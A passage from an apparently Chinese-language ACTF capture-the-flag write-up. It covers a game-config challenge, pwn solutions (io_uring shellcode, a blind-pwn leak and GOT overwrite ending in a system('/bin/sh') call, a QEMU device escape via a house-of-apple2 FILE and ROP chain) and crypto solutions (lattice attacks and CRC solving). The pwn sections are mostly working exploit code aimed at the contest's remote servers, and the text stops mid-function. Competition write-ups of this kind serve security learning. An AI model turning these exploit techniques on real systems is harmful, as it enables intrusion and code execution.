          value: player.energy - 10
- id: ResubmittedFlagCheck
  trigger: HourBegin
  conditions:
    - id: Expression
      expression: itemCount('resubmittedFlag') >= 1
  actions:
    - id: CoinFlip
      probability: 0.85
      success:
        - id: DisplayMessage
          message: message.resubmittedFlagAccepted
          confirm: message.bravo
        - id: UpdateItemAmounts
          updates:
            resubmittedFlag: -1
            flag: 1
        - id: UpdateVariables
          updates:
            player.energy: player.energy + 10
      fail:
        - id: DisplayRandomMessage
          messages:
            - message.resubmittedFlagRejected
          confirm: message.unfortunate
        - id: UpdateItemAmounts
          updates:
            resubmittedFlag: -1
            wrongFlag: 1
        - id: UpdateVariable
          variable: player.energy
          value: player.energy - 20
# tired
- id: Exhaustion
  trigger: HourBegin
  conditions:
  - id: Expression
    expression: "!hasStatus('exhaustion') && player.energy < 40"
  actions:
  - id: DisplayMessage
    message: message.exhaustion
    confirm: message.sucks
  - id: SetStatus
    statusId: exhaustion
    on: true
# captain comments
# TODO: unhappy captain
- id: ExamReminder
  trigger: HourBegin
  once: true
  conditions:
    - id: Expression
      expression: elapsedHour >= 6 && player.examLevel <= 2
  actions:
    - id: DisplayMessage
      message: message.examReminder
      confirm: message.gotit
# CTF over
- id: Timeout
  trigger: HourBegin
  conditions:
    - id: Expression
      expression: elapsedHour > 48
  actions:
  - id: EndGame
    message: message.gameover
    confirm: message.restart
    winning: true

然后正常打拿完8个flag就可以触发check获得flag

Pwn

master-of-orw

利用io_uring系统调用orw。

from pwn import *

import sys

if not sys.warnoptions:
    import warnings
    warnings.simplefilter("ignore")

# context.os = "linux"
# r = process(["gdb", "./exp"])
# r.send("set disassembly-flavor intel\nb main\nstart\n" + "x/i $rip\nsi\n" * 0x300)
# r.interactive()

# with open("exp.asm", "r") as f:
#     all_text = f.read()
#     lines = all_text.split("(gdb)")
#     for line in lines:
#         if("=>") in line:
#             asm_code = line[line.index(">:") + 2:].strip()
#             if(asm_code[:4] == "call"):
#                 print(asm_code)
#             if("endbr64" in asm_code):
#                 continue
#             print(asm_code)

context.terminal = ["tmux", "splitw", "-h"]
context.os = "linux"

# b"\xce\xb8".decode()

# r = process("./master-of-orw", env = {"LD_PRELOAD": "./libc.so.6"})
# gdb.attach(r, "b * $rebase(0x15BD)\nc")
r = remote("120.46.65.156", "32101")

shellcode = b""

payload = """
lea    rax,[rip+0x3f9-7]
xor    edx,edx
push   0x1
pop    rdi
movq   xmm2,rax
sub    rsp,0x108
lea    rbx,[rsp+0x20]
lea    rbp,[rsp+0x40]
movq   xmm0,rbx
push   rbp
pop    rsi
lea    r12,[rsp+0x18]
punpcklqdq xmm0,xmm2
movaps XMMWORD PTR [rsp],xmm0
sub    rsp,0x88
push   rdx
pop    r9
push   rdi
pop    r8
push   0xf
pop    rcx
xor    eax,eax
push   rsp
pop    rdx
push   rdx
pop    rdi
rep stos QWORD PTR es:[rdi],rax
push   r8
pop    rdi
push   r12
push   rbp
push   rdx
pop    rbp
push   rbx
mov    rbx,rsi
mov    rsi,rdx
sub    rsp,0x10
mov    esi,edi
push   0x1a9
pop    rdi
call   syscall_func
pop    r15
lea    rdi,[rbx+0x8]
mov    r12d,eax
and    rdi,0xfffffffffffffff8
mov    QWORD PTR [rbx],0x0
mov    rdx,rbx
mov    QWORD PTR [rbx+0xd0],0x0
mov    ecx, 26
rep stos QWORD PTR es:[rdi],rax
lea    rcx,[rbx+0x68]
mov    edi,r12d
mov    r13d,edi
push   r12
mov    r12,rcx
push   rbp
mov    rbp,rdx
push   rbx
mov    rbx,rsi
push   r15
mov    edx,DWORD PTR [rsi]
mov    eax,DWORD PTR [rsi+0x40]
mov    esi,DWORD PTR [rsi+0x4]
lea    rax,[rax+rdx*4]
mov    edx,DWORD PTR [rbx+0x64]
shl    rsi,0x4
mov    QWORD PTR [rbp+0x48],rax
add    rsi,rdx
mov    QWORD PTR [rcx+0x38],rsi
mov    rsi,QWORD PTR [rbp+0x48]
mov    QWORD PTR [r12+0x38],rsi
mov    r8d,r13d
push   0x8001
pop    rcx
push   0x3
pop    rdx
xor    edi,edi
call   mmap64_func
mov    QWORD PTR [rbp+0x50],rax
mov    QWORD PTR [r12+0x40],rax
mov    edx,DWORD PTR [rbx+0x28]
mov    esi,DWORD PTR [rbx]
mov    r9d,0x10000000
mov    r8d,r13d
push   0x8001
pop    rcx
shl    rsi,0x6
push   0
pop    r15
loop1:
    add    rdx,rax
    mov    QWORD PTR [rbp+r15*8],rdx
    mov    edx,DWORD PTR [rbx+0x2c+r15*4]
    inc    r15
    cmp    r15, 6
    jnz loop1
add    rax,rdx
push   0x3
pop    rdx
mov    QWORD PTR [rbp+0x30],rax
call   mmap64_func
mov    QWORD PTR [rbp+0x38],rax
mov    edx,DWORD PTR [rbx+0x50]
mov    rax,QWORD PTR [r12+0x40]
push   0
pop    r13
push   0
pop    r15
loop2:
    add    rdx,rax
    mov    QWORD PTR [r12+r15*8],rdx
    mov    edx,DWORD PTR [rbx+0x54+r15*4]
    inc    r15
    cmp    r15, 4
    jnz loop2
add    rdx,rax
mov    QWORD PTR [r12+0x28],rdx
mov    edx,DWORD PTR [rbx+0x64]
add    rdx,rax
mov    QWORD PTR [r12+0x30],rdx
mov    edx,DWORD PTR [rbx+0x68]
add    rax,rdx
mov    QWORD PTR [r12+0x20],rax
pop    r15
pop    rbx
pop    rbp
pop    r12
mov    r13d,eax
mov    eax,DWORD PTR [rbp+0x8]
mov    DWORD PTR [rbx+0xc4],r12d
mov    DWORD PTR [rbx+0xc0],eax
mov    eax,DWORD PTR [rbp+0x14]
mov    DWORD PTR [rbx+0xc8],eax
pop    r15
pop    rbx
pop    rbp
pop    r12
add    rsp,0x88
push   rbp
pop    rdi
call   io_uring_get_sqe_func
pxor   xmm1,xmm1
movdqa xmm0,XMMWORD PTR [rsp]
movabs rcx,0xffffffff0000001c
movaps XMMWORD PTR [rsp+0x20],xmm1
mov    QWORD PTR [rsp+0x30],0x0
mov    QWORD PTR [rax],rcx
mov    QWORD PTR [rax+0x18],0x18
mov    QWORD PTR [rax+0x20],0x0
mov    QWORD PTR [rax+0x28],0x0
movups XMMWORD PTR [rax+0x8],xmm0
pxor   xmm0,xmm0
movups XMMWORD PTR [rax+0x30],xmm0
call   io_uring_submit_func
xor    edx,edx
mov    ecx,0x1
mov    rsi,r12
mov    rdi,rbp
call   __io_uring_get_cqe_func
mov    rax,QWORD PTR [rsp+0x18]
xor    r9d,r9d
xor    edi,edi
mov    rdx,QWORD PTR [rsp+0xa8]
mov    ecx,0x2
mov    esi,0x30
mov    r8d,DWORD PTR [rax+0x8]
mov    eax,DWORD PTR [rdx]
add    eax,0x1
mov    DWORD PTR [rdx],eax
mov    edx,0x3
call   mmap64_func
mov    rdi,rbp
mov    QWORD PTR [rsp+0x28],0x40
mov    QWORD PTR [rsp+0x20],rax
call   io_uring_get_sqe_func
pxor   xmm0,xmm0
mov    rdi,rbp
movabs rsi,0x100000002
mov    QWORD PTR [rax],rsi
mov    QWORD PTR [rax+0x8],0x0
mov    QWORD PTR [rax+0x10],rbx
mov    QWORD PTR [rax+0x18],0x1
mov    QWORD PTR [rax+0x20],0x0
mov    QWORD PTR [rax+0x28],0x0
movups XMMWORD PTR [rax+0x30],xmm0
call   io_uring_submit_func
xor    r8d,r8d
xor    edx,edx
mov    ecx,0x1
mov    rsi,r12
mov    rdi,rbp
call   __io_uring_get_cqe_func

io_uring_get_sqe_func:
mov    rax,QWORD PTR [rdi]
xor    r8d,r8d
mov    ecx,DWORD PTR [rax]
mov    eax,DWORD PTR [rdi+0x44]
lea    edx,[rax+0x1]
mov    esi,edx
sub    esi,ecx
mov    rcx,QWORD PTR [rdi+0x18]
mov    rcx,QWORD PTR [rdi+0x10]
and    eax,DWORD PTR [rcx]
mov    DWORD PTR [rdi+0x44],edx
shl    rax,0x6
add    rax,QWORD PTR [rdi+0x38]
mov    r8,rax
mov    rax,r8
ret

io_uring_submit_func:
push   r15
mov    r10,QWORD PTR [rdi+0x8]
mov    edx,DWORD PTR [rdi+0x40]
mov    r8d,DWORD PTR [rdi+0x44]
mov    eax,DWORD PTR [r10]
sub    r8d,edx
mov    rcx,QWORD PTR [rdi+0x10]
mov    r9,QWORD PTR [rdi+0x30]
add    r8d,eax
mov    ecx,DWORD PTR [rcx]
nop    DWORD PTR [rax+0x0]
mov    esi,eax
and    edx,ecx
add    eax,0x1
and    esi,ecx
mov    DWORD PTR [r9+rsi*4],edx
mov    edx,DWORD PTR [rdi+0x40]
add    edx,0x1
mov    DWORD PTR [rdi+0x40],edx
mov    DWORD PTR [r10],eax
mov    rdx,QWORD PTR [rdi]
sub    eax,DWORD PTR [rdx]
xor    edx,edx
mov    esi,eax
mov    eax,DWORD PTR [rdi+0xc0]
mov    ecx,eax
and    ecx,0x2
mov    r8d,ecx
or     r8d,0x1
test   al,0x1
cmovne ecx,r8d
mov    edi,DWORD PTR [rdi+0xc4]
mov    r9,r8
mov    r8d,ecx
mov    ecx,edx
mov    edx,esi
mov    esi,edi
mov    edi,0x1aa
push   r15
push   0x8
call   syscall_func
pop    rdx
pop    rcx
pop    r15
ret

syscall_func:
mov    rax,rdi
mov    rdi,rsi
mov    rsi,rdx
mov    rdx,rcx
mov    r10,r8
mov    r8,r9
mov    r9,QWORD PTR [rsp+0x8]
syscall
ret

__io_uring_get_cqe_func:
sub    rsp,0x28
mov    DWORD PTR [rsp],edx
mov    rdx,rsp
movabs rax,0x800000000
mov    DWORD PTR [rsp+0x4],ecx
mov    QWORD PTR [rsp+0x8],rax
mov    QWORD PTR [rsp+0x10],r8
push   r13
mov    r13,rsi
push   r12
mov    r12,rdx
push   rbp
mov    rbp,rdi
push   rbx
push   r15
nop    DWORD PTR [rax+rax*1+0x0]
mov    rax,QWORD PTR [rbp+0x78]
mov    esi,DWORD PTR [rax]
mov    rax,QWORD PTR [rbp+0x70]
mov    edx,DWORD PTR [rax]
mov    rcx,QWORD PTR [rbp+0x68]
mov    eax,DWORD PTR [rcx]
sub    edx,eax
mov    ebx,esi
and    ebx,eax
shl    rbx,0x4
add    rbx,QWORD PTR [rbp+0x98]
mov    esi,DWORD PTR [r12]
xor    r8d,r8d
mov    QWORD PTR [r13+0x0],rbx
add    rsp,0x8
mov    eax,r8d
pop    rbx
pop    rbp
pop    r12
pop    r13
add    rsp,0x28
ret

mmap64_func:
mov    r10d,ecx
push   0x9
pop    rax
syscall
ret
"""

shellcode += asm(payload, arch = "amd64")
print(hex(len(shellcode)))

r.sendafter("Input your code\n", shellcode + b"\x00" * (0x3f9 - len(shellcode)) + b"/flag\x00")
r.interactive()

盲Pwn，感觉得先找到栈溢出在哪边，然后试着泄露一下栈上的数据

试着输入

1
2

7d40w
回车

能够泄露一些栈的基本数据，可以利用这一点寻找BROP

目前感觉，程序使用了一个结构体:

typedef struct{
   char buffer[8];
   char* bufferptr;
}BufferOffset

这个程序在

1	Aaaaaaa\x00>

前半部打印的时候，会使用这个结构体，而且这个结构体猜测它是这样放的:

1	[Aaaaaaa\x00][bufferptr]

所以，当我们尝试使用

d[num]s

的时候，这个offset就会发生位移

经过测试，利用下面的位移就能够通过修改指针，实现任意地址泄露

# success poc
content = try_steps(ph,"7d")
print(content)

content = try_steps(ph,"1w")
print(content)

content = try_steps(ph,"d")
print(content)

content = try_steps(ph,"8w") # 这里w表示+，s表示-，想要泄露哪个地址就用对应的偏移即可
print(content)

content = try_steps(ph,"8a")
print(content)

content = try_steps(ph,"7s")
print(content)

然后根据上述的思路，可以先编写一个用于泄露的脚本

from pwn import *

context.log_level = "DEBUG"

def calc_offset(num1, num2):
    res1 = []
    res2 = []
    if num1 == 0:
        res1 = [0]
    if num2 == 0:
        res2 = [0]
  
    while num1 > 0 and num2 > 0:
        res1.append(num1 % 256)
        num1 //= 256
        res2.append(num2 % 256)
        num2 //= 256

    ret_str = []
    for n1, n2 in zip(res1, res2):
        ret_str.extend([str(n1) + 's', str(n2) + 'w'])
        ret_str.append('d')

    # skip last one
    return ret_str[:-1]

def try_steps(ph, in_str):
    content = ph.recvuntil(">")
    ph.sendline(in_str)
    # content = ph.recvuntil("\n")
    return content

def leak_content(ph,str_base,test_address):
  
    ret_content = ""
    ph.sendline("8d")
    content = ph.recvuntil("\n")
    print(content)

    # here, we will calculate the return address
    send_str = calc_offset(str_base,test_address)
    print(send_str)
    content = try_steps(ph,''.join(send_str))
    log.debug("Here try to leak return address content")
    # content = ph.recvuntil("\n> ")
    content = ph.recvb(numb=1)
    content += ph.recvb(100)
    content += ph.recvb(100)

    print(content)
    print(len(content))
    ret_content = content[1:9]
    # fd.flush()

    # move return
    # first, move back
    offset = str_base - test_address
    ph.sendline(str(offset)+"d")

    content = ph.recvuntil("\n>")
    print(content)

    # then, change it one by one
    send_str.reverse()
    rev_send_str = []
    for each in send_str:
        if each == 'd':
            rev_send_str.append('a')
        elif 'w' in each:
            rev_send_str.append(each.replace('w','s'))
        elif 's' in each:
            rev_send_str.append(each.replace('s','w'))
    print(rev_send_str)
    ph.sendline(''.join(rev_send_str))
    # content = try_steps(ph,"16s")
    # print(content)
    ph.recvuntil("\n>")

    ph.sendline(str(offset)+"a"+"8a")
    content = ph.recvuntil("\n")
    print(content)

    return ret_content


ph = remote("120.46.65.156",32104)
banner = ph.recvuntil("submit.")
print(banner)
print("------")

# success poc
content = try_steps(ph,"7d1w")
print(content)
content = try_steps(ph,"d")
print(content)

content = try_steps(ph,"8w")
log.debug("Here try to leak address")
content = ph.recvuntil("\n")
print(content)
# don't know why not align....
str_base = u64(content[1:9]) - 8

# ph.sendline(in_str)
print("ste_base leak address is 0x%x"%str_base)
# return origin
content = try_steps(ph,"8a")
print(content)

content = try_steps(ph,"8s")
print(content)

content = try_steps(ph,"8d16w")
log.debug("Here try to leak return address")
content = ph.recvuntil("\n")
print(content)
# don't know why not align....
ret_address = u64(content[1:9])
print("ret_address leak address is 0x%x"%ret_address)

ph.sendline("16a")
content = ph.recvuntil("\n>")
print(content)

ph.sendline("16s")
# content = try_steps(ph,"16s")
print(content)
print(ph.recvuntil("\n>"))

# content = try_steps(ph,"8a")
ph.sendline("8d")
content = ph.recvuntil("\n")
print(content)

# print("Here, try to leak..................")

start_address = ret_address&0xfffffffffffff000
start_address -= 0x1000

test_address = start_address + 0x6a0
end_address = start_address + 0x5000

fd = open("dump",'ab')
while test_address < end_address:

    print("[+++++++++++++++++++] address 0x%x ,offset0x%x[++++++++++++++++]"%(test_address, test_address - start_address))
    ph.sendline("8d")
    content = ph.recvuntil("\n")
    print(content)

    # here, we will calculate the return address
    send_str = calc_offset(str_base,test_address)
    print(send_str)
    content = try_steps(ph,''.join(send_str))
    log.debug("Here try to leak return address content")
    # content = ph.recvuntil("\n> ")
    content = ph.recvb(numb=1)
    content += ph.recvb(100)
    content += ph.recvb(100)

    print(content)
    print(len(content))
    fd.write(content[1:9])
    fd.flush()

    # move return
    # first, move back
    offset = str_base - test_address
    ph.sendline(str(offset)+"d")

    content = ph.recvuntil("\n>")
    print(content)

    # then, change it one by one
    send_str.reverse()
    rev_send_str = []
    for each in send_str:
        if each == 'd':
            rev_send_str.append('a')
        elif 'w' in each:
            rev_send_str.append(each.replace('w','s'))
        elif 's' in each:
            rev_send_str.append(each.replace('s','w'))
    print(rev_send_str)
    ph.sendline(''.join(rev_send_str))
    # content = try_steps(ph,"16s")
    # print(content)
    ph.recvuntil("\n>")

    ph.sendline(str(offset)+"a"+"8a")
    content = ph.recvuntil("\n")
    print(content)
    test_address += 8

fd.close()

完成leak操作之后，虽然binary不太能看，但是勉强已经能做了。感觉之前有些分析的逻辑有点不对，不过就顺势做下去就好了。利用前面的偏移操作实现任意地址写，然后泄露libc，完成ret2libc即可。

最后稍微提一个小坑：因为这个最后/bin/sh字符串执行的时候，存在s，会导致偏移发生错乱，所以这里需要再修改指针最后加一个移动（做到这一步的人应该能理解我在说什么）


setbuf_got  = 0x4038 + start_address
printf_got = 0x4040 + start_address
printf_plt = 0x56CF0

test_address = printf_got
printf_real = 0
print("[+++++++++++++++++++] address 0x%x ,offset0x%x[++++++++++++++++]"%(test_address, test_address - start_address))
printf_real = leak_content(ph, str_base, printf_got)
print("LEAKING INFO")
print(printf_real)
printf_real = u64(printf_real)
libc_base = printf_real - printf_plt
real_system = 0x48e50 + libc_base
print("Test libc_base base address is 0x%x"%libc_base)
# print("Test real_system base address is 0x%x"%real_system)
# # print("test libc address")

# header = leak_content(ph, str_base, real_system)
# header += leak_content(ph, str_base, real_system+8)
# header += leak_content(ph, str_base, real_system+0x10)
# header += leak_content(ph, str_base, real_system+0x18)
# print(header)

print("[++++++++++++++++] modify target adata")
# modify this got
test_address = 0x4018+start_address
ret_content = ""
ph.sendline("8d")
content = ph.recvuntil("\n")
print(content)

# here, we will calculate the return address
send_str = calc_offset(str_base,test_address)
print(send_str)
content = try_steps(ph,''.join(send_str))
log.debug("Here try to attack !!")
# content = ph.recvuntil("\n> ")
content = ph.recvb(numb=1)
content += ph.recvb(100)
content += ph.recvb(100)

print(content)
print(len(content))
origin_data = content[1:9]

ph.sendline("13a")
content = ph.recvuntil("\n")
print(content)

# modify the offset

# here, try to modify it
# data must be array
data = p64(real_system)
# if type(data) != list:
#     exit(0)
# ph.interactive()
modify_str = ""
for i,each in enumerate(data):
    modify_str = modify_str + str(origin_data[i]) + "s" + str(ord(each)) + "w"
    modify_str += "d"
modify_str = modify_str[:-1]
# finish attach
modify_str += ";/bin/sh"
print(modify_str)
ph.interactive()

qemuplayground-2

mmio越界覆盖4字节的指针，相对地址大范围读写，可以泄露堆上的unsortbin指针然后找到本线程的arena，再通过多次解引用找到main_arena，泄露libc地址，最后打house of apple2的链子运行system(“cat flag 1>&2”)

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

unsigned char *mmio_mem;

void die(const char *msg) {
    perror(msg);
    exit(-1);
}
unsigned int pmio_base = 0xc040;

uint32_t pmio_read(uint32_t addr)
{
    return (uint32_t)inl(addr + pmio_base);
}

uint8_t pmio_read_byte(uint32_t addr)
{
    return (uint8_t)inb(addr + pmio_base);
}

void pmio_write_dword(uint32_t addr, uint32_t value)
{

    outl(value, addr + pmio_base);
}

void pmio_write_word(uint32_t addr, uint16_t value)
{

    outw(value, addr + pmio_base);
}

void pmio_write_byte(uint32_t addr, uint8_t value)
{

    outb(value, addr + pmio_base);
}

void mmio_write(uint32_t addr, uint64_t value)
{
    *((uint64_t *)(mmio_mem + addr)) = value;
}

void mmio_write_dword(uint32_t addr, uint32_t val) {

    *((uint32_t *)(mmio_mem + addr)) = val;
}

uint32_t mmio_read_dword(uint32_t addr, uint32_t val) {
  
    return *((uint32_t *)(mmio_mem + addr));
}

uint64_t mmio_read(uint32_t addr)
{
    return *((uint64_t *)(mmio_mem + addr));
}

uint64_t u64(unsigned char * s) {
    uint64_t result = 0;
    for (int i = 7 ; i >=0 ;i--) {
        result = (result << 8) | (0x00000000000000ff&s[i]);
    }
    return result;
}

void p() {
    printf("> ");
    fflush(stdout);
    getchar();
}

uint32_t read_ptr_dword(uint32_t off) {
    uint32_t res = 0;
    for(int i = 3; i >= 0; i--){
        res <<= 8;
        uint8_t tmp = pmio_read_byte(0x10 + i + off);
        res += tmp;
    }
    return res;
}

void write_ptr_dword(uint32_t off, uint32_t val) {
    for(int i = 0; i < 4; i++) {
        uint8_t tmp = val & 0xff;
        pmio_write_byte(0x10 + i + off, tmp);
        val >>= 8;
    }
}

uint32_t u32(uint64_t addr) {
    return addr & 0xffffffff;
}

uint64_t read_ptr_qword(uint32_t off) {
    uint64_t low = read_ptr_dword(off);
    uint64_t high = read_ptr_dword(off + 4);
    return (high << 32) + low;
}

void set_ptr(uint32_t addr) {
    mmio_write_dword(0x40, addr);
}

uint64_t read_qword_in(uint64_t addr) {
    set_ptr(u32(addr));
    return read_ptr_qword(0);
}

void write_qword_in(uint64_t addr, uint64_t val) {
    set_ptr(u32(addr));
    write_ptr_dword(0, u32(val));
    write_ptr_dword(4, u32(val >> 32));
}
// void write_str(unsigned char * s, uint32_t len) {
//     for(int i = 0; i < len; i++) {
//         pmio_write_byte()
//     }
// }

#define NEXT_ARENA_OFF 0x8a0
#define MAIN_ARENA_OFF 0x219c80
#define SYSTEM_OFF 0x50d70
#define STDERR_OFF 0x21a6a0
#define FAKE_WIDE_FILE_OFF 0x21b000
#define WFILE_JUMPS_OFF 0x2160c0

#define CMD_OFF 0x158

int main(int argc, char *argv[]) {

    // Open and map I/O memory for the strng device
    int mmio_fd =
        open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    if (iopl(3) != 0) {
        die("io permission");
    }

    // mmio_read()
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(mmio_mem<0){
        die("mmap mmio_mem");
    }
    char flag1[] = "ACTF{cH3cK_1n_wI7h_B@by_C1ph3r_Te$t_1n_Q3MU_pl4yg3OuNd_1$_EASy!}";
    for(int i = 0; i < sizeof(flag1) - 1; i += 4) {
        mmio_write_dword(i, *(uint32_t * )(flag1 + i));
    }

    pmio_write_byte(1, 0x20);

    while(pmio_read_byte(0x1) != 1);

    pmio_write_byte(0x1f, 0x40);
    uint64_t arena_ptr = (read_ptr_qword(0) & -0x1000) + NEXT_ARENA_OFF;
    printf("heap_arena = %#lx\n", arena_ptr);

    uint64_t next_arena_ptr = (read_qword_in(arena_ptr) & -0x1000) + NEXT_ARENA_OFF;
    printf("next_arena = %#lx\n", next_arena_ptr);

    uint64_t libc_arena = read_qword_in(next_arena_ptr);
    printf("libc_arena = %#lx\n", libc_arena);

    uint64_t libc_base = libc_arena - MAIN_ARENA_OFF;
    printf("libc_base = %#lx\n", libc_base);

    uint64_t system_func = libc_base + SYSTEM_OFF;
    // write_qword_in(libc_arena, system_func);

    uint64_t stderr_ptr = libc_base + STDERR_OFF;
    write_qword_in(stderr_ptr, 0ull);
    write_qword_in(stderr_ptr + 0x8, 0xa81ull);
  
    uint64_t fake_wfile_ptr = libc_base + FAKE_WIDE_FILE_OFF;
    write_qword_in(stderr_ptr + 0xa0, fake_wfile_ptr);

    write_qword_in(stderr_ptr + 0xc0, 3ull); // mode

    uint64_t wfile_jumps = libc_base + WFILE_JUMPS_OFF;
    write_qword_in(stderr_ptr + 0xd8, wfile_jumps);

    // write_qword_in(fake_wfile_ptr + 0x18, 0ull);
    // write_qword_in(fake_wfile_ptr + 0x30, 0ull);

    write_qword_in(fake_wfile_ptr + 0x20, 1ull); // set wide_file._IO_write_ptr

    write_qword_in(fake_wfile_ptr + 0xe0, fake_wfile_ptr + 0x80);

// 0x000000000005a120: mov rsp, rdx; ret;
    typedef uint64_t u64;
    u64 mov_rsp_rdx = libc_base + 0x000000000005a120;
// 0x00000000000c46bc: add rsp, 0x100; sub rax, rdx; ret;
    u64 adjust_stack = libc_base + 0x00000000000c46bc;
    u64 pop_rdi = libc_base + 0x000000000002a3e5;
    u64 pop_rsi = libc_base + 0x000000000002be51;
    u64 pop_rdx = libc_base + 0x00000000000796a2;
    u64 pop_rax = libc_base + 0x0000000000045eb0;
    u64 syscall_ret = libc_base + 0x0000000000091316;

    write_qword_in(fake_wfile_ptr + 0x0, adjust_stack);
    write_qword_in(fake_wfile_ptr + 0xe8, mov_rsp_rdx);

    u64 ropchain[] = {
        pop_rdi,
        fake_wfile_ptr + CMD_OFF,
        pop_rdi + 1,
        system_func
    };

    for(int i = 0; i < sizeof(ropchain) / sizeof(ropchain[0]); i++) {
        write_qword_in(fake_wfile_ptr + 0x108 + i * 8, ropchain[i]);
    }

    u64 cmd[] = {
        7449354444534473059ull,
        215389974816ull
    };

    for(int i = 0; i < sizeof(cmd) / sizeof(cmd[0]); i++) {
        write_qword_in(fake_wfile_ptr + CMD_OFF + i * 8, cmd[i]);
    }
  

    // p();
    return 0;
}

Crypto

EasyRSA

$$ED-k_1n_1=A\ED-an_2=B\ED-dn_3=C$$

存在这三个等式关系，其中D，A，B，C均为小于E的较小数直接造格就好

M = Matrix(ZZ,[[e,e,e,2^767],
               [n1,0,0,0],
               [0,n2,0,0],
               [0,0,n3,0]])
# e_*d_-k1*n1,n1
d=abs(M.LLL()[0][3]//2^767)
long_to_bytes(ZZ(pow(c,d,n1)))
#ACTF{5FFC427B-F14F-DCA0-C425-675B149890C2}ACTF{5FFC427B-F14F-DCA0-C425-675B149890C2}

MDH

# sage
from hashlib import sha256

ct = 8308943029741424587523612386337754255889681699670071706719724435165094611096603769021839263
pa = []
pb = []
p = 308955606868885551120230861462612873078105583047156930179459717798715109629
Fp = GF(p)
pa = Matrix(Fp, pa)
pb = Matrix(Fp, pb)
shared = pa*pb.T
shared = shared.trace()
shared = int(sha256(str(int(shared)).encode()).hexdigest(), 16)
flag = shared ^^ ct
flag = bytes.fromhex(hex(flag)[2:])
print(flag)

claw crane

这里是用WASD去移动到特定的position，显然方案不止一种，不同的方案会影响后边函数gen_chaos的输出

destiny函数直接影响了score，delta越小以及bless越大则赢的概率越大。因此考虑怎么让delta小一点，而p和q是可控的，这里考虑造个格(?)规约。或者不管r的值，毕竟它经过md5输出也不太可控，把delta的式子看作不定方程。

md5那个位置该怎么利用没想好。

可以通过前64个move来控制vs，使得计算md5(self.seed + vs)的时候，结果总是上一次的self.seed，r就固定了：

1 2	last_chaos = ... vs = (-last_chaos -1) % pow(2, 128)

再通过move[64:]走到pos处

from pwn import *
from multiprocessing.spawn import freeze_support
from pwnlib.util.iters import mbruteforce
from hashlib import sha1

# context.log_level = "debug"
def proof_of_work(conn):
    conn.recvuntil("prefix+\"")
    suffix = conn.recv(58).decode()
    conn.recvuntil("==")
    digest = conn.recvline().strip().decode("utf8")

    def f(x):
        return sha1((x + suffix).encode()).hexdigest() == digest

    proof = mbruteforce(f, "0123456789abcdef", length=6, method='fixed')
    print(f"proof: {proof}")

    conn.sendlineafter("prefix = ?\n", proof.encode())

def solve_choas(last_choas, idx, pos):
    def mapping(x):
        if x=='0': return "W"
        if x=='1': return "S"
        if x=='2': return "A"
        if x=='3': return "D"

    target = (-last_choas-1)*(idx-1) % pow(2, 128)
    moves = ""
    while target:
        moves = mapping(str(target % 4)) + moves
        target //= 4
    if len(moves) != 64:
        moves = mapping("0") * (64 - len(moves)) + moves
    # print(f"moves[:64] is {moves[:64]}")

    current_pos = check_pos(moves)
    # print(f"moves[:64] pos is {current_pos}")

    sol_moves = solve_pos(current_pos, pos)
    # print(f"moves[64:] is {sol_moves}")
    moves = moves + sol_moves

    return moves

def check_pos(moves):
    col, row = 0, 0
    for move in moves:
        if move == "W":
            if row < 15: row += 1
        elif move == "S":
            if row > 0: row -= 1
        elif move == "A":
            if col > 0: col -= 1
        elif move == "D":
            if col < 15: col += 1
        else:
            return -1
    print(col, row)
    return [col, row]

def solve_pos(current_pos, target_pos):
    x0, y0 = current_pos
    x1, y1 = target_pos

    sol = ""
    if x0 < x1:
        sol += "D" * (x1-x0)
    else:
        sol += "A" * (x0-x1)
    if y0 < y1:
        sol += "W" * (y1-y0)
    else:
        sol += "S" * (y0-y1)
    return sol

def solve_pq(choas):
    L = matrix(ZZ, [[2^128, 0], [choas, 1]])
    S = L.LLL()
    len_1s = bin(int(S[0][0]))[2:].count("1")
    print(bin(int(S[0][0])))
    print(len_1s)
    if len_1s > 30:
        raise Exception("too many 1s")
    v = L.solve_left(S[0])
    p, q = v[0], v[1]
    return abs(p), abs(q), len_1s

def main():
    freeze_support()

    for tries in range(1000):
        conn = remote("152.136.172.227", 22222)
        # conn = remote("127.0.0.1", 22222)

        print(f"[{tries}] proof of work...")
        proof_of_work(conn)
        print(f"[{tries}] proof of work done!")

        idx = 0
        fail = 0
        success = 0
        choas = -1
        len_1s = None
        p, q = None, None

        print(f"[{tries}] tries...")
        try:
            while idx < 256:
                idx += 1
                conn.recvuntil(b"i am at ")
                line = conn.recvline().strip().decode()
                x1, y1 = line.split("]")[0].split("[")[1].split(",")
                x1, y1 = int(x1), int(y1)
                print(f"[{idx}] target pos: [{x1}, {y1}]")

                moves = solve_choas(choas, idx, [x1, y1])
                conn.sendlineafter(b"Your moves: ", moves.encode())

                conn.recvuntil(b"choas: ")
                choas = int(conn.recvline().strip().decode())
                print(f"[{idx}] choas: {choas}")

                if not p and not q:
                    p, q, len_1s = solve_pq(choas)

                # if fail < 28:
                #     conn.sendlineafter(b"(e.g.: 1,1):", f"{18446744073709551615}, {1}".encode())
                # else:
                conn.sendlineafter(b"(e.g.: 1,1):", f"{p}, {q}".encode())

                res = conn.recvline().strip().decode()
                if "sorry" in res:
                    fail += 1
                else:
                    success += 1
                score = conn.recvline().strip().decode()
                print(score)

            print(f"count('1'): {len_1s}")

            conn.interactive()
        except:
            continue
        finally:
            conn.close()

if __name__ == "__main__":
    main()

CRCRC

在crc128中有一个初始值，经过调试可以得到头尾固定时的状态转移过程

$$state_1->state_2->state_3->state_4$$

由1到2是前一段base64可得，由4->3反推可以使用上面的re_crc128函数

所以最终要解决就是已知状态2和状态3，求一个在base64表中的的data值

$$crc(\Delta \oplus a)\oplus crc(\Delta \oplus b) = \textrm{const}\quad \forall \Delta$$

由这个式子可以转换成mod2加法，由于需要可见字符，所以考虑更多bytes的data，测试考虑30位的data，这样base64decode可以满足flag条件

如何对于矩阵来说

则矩阵形式为128（308）X=1281

所以可以固定243<308-128位，直接固定每个字符前3位为010，在再解空间爆破

def crc128(data, poly=0x883ddfe55bba9af41f47bd6e0b0d8f8f):
    crc = 0x9aefa6cb65b524cf97abaa31b3c757e3
    for b in data:
        crc ^^= b
        for _ in range(8):
